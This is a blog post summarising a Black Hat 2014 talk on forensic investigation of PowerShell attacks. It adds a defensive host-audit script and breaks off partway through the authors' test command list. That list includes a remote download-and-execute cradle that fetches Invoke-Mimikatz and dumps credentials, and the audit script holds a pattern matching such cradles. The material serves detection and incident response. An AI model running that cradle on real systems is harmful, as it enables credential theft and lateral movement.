Black Hat USA 2014 Presentation: Investigating PowerShell Attacks


This is an excellent presentation and I highly recommend it to anyone who is an admin or who is responsible for AD security.

Investigating PowerShell Attacks
Ryan Kazanciyan Technical Director, Mandiant
Matt Hastings Consultant, Mandiant

Over the past two years, we’ve seen targeted attackers increasingly utilize PowerShell to conduct command-and-control in compromised Windows environments. If your organization is running Windows 7 or Server 2008 R2, you’ve got PowerShell 2.0 installed (and on Server 2012, remoting is enabled by default!). This has created a whole new playground of attack techniques for intruders that have already popped a few admin accounts (or an entire domain). Even if you’re not legitimately using PowerShell to administer your systems, you need to be aware of how attackers can enable and abuse its features.

This presentation will focus on common attack patterns performed through PowerShell – such as lateral movement, remote command execution, reconnaissance, file transfer, etc. – and the sources of evidence they leave behind. We’ll demonstrate how to collect and interpret these forensic artifacts, both on individual hosts and at scale across the enterprise. Throughout the presentation, we’ll include examples from real-world incidents and recommendations on how to limit exposure to these attacks.

From their whitepaper:

The authors therefore based their research on the following assumptions:

• The attacker can obtain administrator-equivalent rights on the target system – most typically, the credentials for a privileged domain account.

• The attacker can laterally access the target system over common Windows ports and protocols (e.g. SMB, NetBIOS, and/or WinRM).

• The attacker can remotely enable PowerShell remoting and the WinRM service on a remote host by means of other native-Windows commands – such as through a scheduled task (“at” command), the service control manager (“sc” command), or Windows Management Instrumentation (WMI).

• The attacker can bypass the default “Restricted” policy under which PowerShell will execute scripts.

• The attacker, given administrator privileges, could bypass or disable a constrained remoting endpoint configured to limit the scope of PowerShell commands available to a user. (A lower-privileged attacker might also bypass such controls – Joseph Bialek and Lee Holmes have also recently blogged on techniques to break out of a constrained runspace, if implemented with vulnerable code, and run unauthorized commands.)
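The assumptions above describe host-level conditions a defender can check for directly: whether WinRM is running and listening, what execution policy is in force, which session configurations exist and who may connect to them, and whether the host has already accepted remoting sessions or logged a download cradle. The following audit script is an added example written for this post, not code from the presentation or whitepaper; it assumes an elevated PowerShell 3+ session, treats engine-start events (ID 400) with HostName=ServerRemoteHost as remoting evidence, and only sees script block events (ID 4104) where script block logging is enabled.

```powershell
# Added example (not from the Black Hat talk or whitepaper): audit one host for the
# remoting preconditions the authors assume an attacker can create or abuse.
# Assumes: run elevated; PowerShell 3+ (Get-CimInstance); ID 4104 needs script block logging.
function Get-RemotingExposure {
    [CmdletBinding()]
    param([int]$Days = 7)

    $since = (Get-Date).AddDays(-$Days)

    # 1. WinRM service state: remoting enabled via at/sc/WMI leaves the service running
    $svc = Get-CimInstance Win32_Service -Filter "Name='WinRM'"

    # 2. WSMan listeners exist only once remoting has been configured on this host
    $listeners = @()
    try {
        $listeners = Get-ChildItem WSMan:\localhost\Listener -ErrorAction Stop |
            Select-Object -ExpandProperty Name
    } catch {}

    # 3. Execution policy per scope; anything looser than the default Restricted/AllSigned
    #    removes the barrier the authors assume an attacker has to bypass
    $policies = Get-ExecutionPolicy -List |
        ForEach-Object { "{0}={1}" -f $_.Scope, $_.ExecutionPolicy }

    # 4. Session configurations (including constrained endpoints) and their ACLs
    $endpoints = @()
    try {
        $endpoints = Get-PSSessionConfiguration -ErrorAction Stop | Select-Object Name, Permission
    } catch {}

    # 5. Engine-start events (ID 400, classic "Windows PowerShell" log) whose host is
    #    ServerRemoteHost are remoting sessions this machine accepted
    $remoteStarts = @(Get-WinEvent -FilterHashtable @{LogName='Windows PowerShell'; Id=400; StartTime=$since} `
        -ErrorAction SilentlyContinue | Where-Object { $_.Message -match 'HostName=ServerRemoteHost' })

    # 6. Script block logging (ID 4104) catching an in-memory download cradle like the
    #    Net.WebClient/DownloadString pattern used in the authors' test sequence
    $cradles = @(Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104; StartTime=$since} `
        -ErrorAction SilentlyContinue | Where-Object { $_.Message -match 'DownloadString|Net\.WebClient' })

    [pscustomobject]@{
        WinRMState           = "$($svc.State)/$($svc.StartMode)"
        Listeners            = $listeners
        ExecutionPolicies    = $policies
        Endpoints            = $endpoints
        RemoteSessionStarts  = $remoteStarts.Count
        DownloadCradleBlocks = $cradles.Count
    }
}

Get-RemotingExposure -Days 7 | Format-List
```

A non-zero RemoteSessionStarts count on a host that is not administered over PowerShell remoting is the kind of artifact the presentation suggests collecting at scale; run the function through Invoke-Command against an inventory of hosts to do so.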


The authors executed the following sequence of commands during testing. These commands were chosen as representative examples of how an attacker might interact with a targeted system through PowerShell. They also make use of basic cmdlets that are likely to be used even in more complex attacks.

• Single remote cmdlet execution through Invoke-Command, such as:
Invoke-Command {Get-ChildItem c:\}

• Single remote binary execution through Invoke-Command, such as:
Invoke-Command {c:\malware.exe}

• Remote in-memory download and execution of PowerSploit framework script Invoke-Mimikatz.ps1, such as:
{iex((New-Object Net.WebClient).DownloadString('https://raw.'));Invoke-Mimikatz -DumpCreds}

• Remote interactive PowerShell command session initiated with the syntax: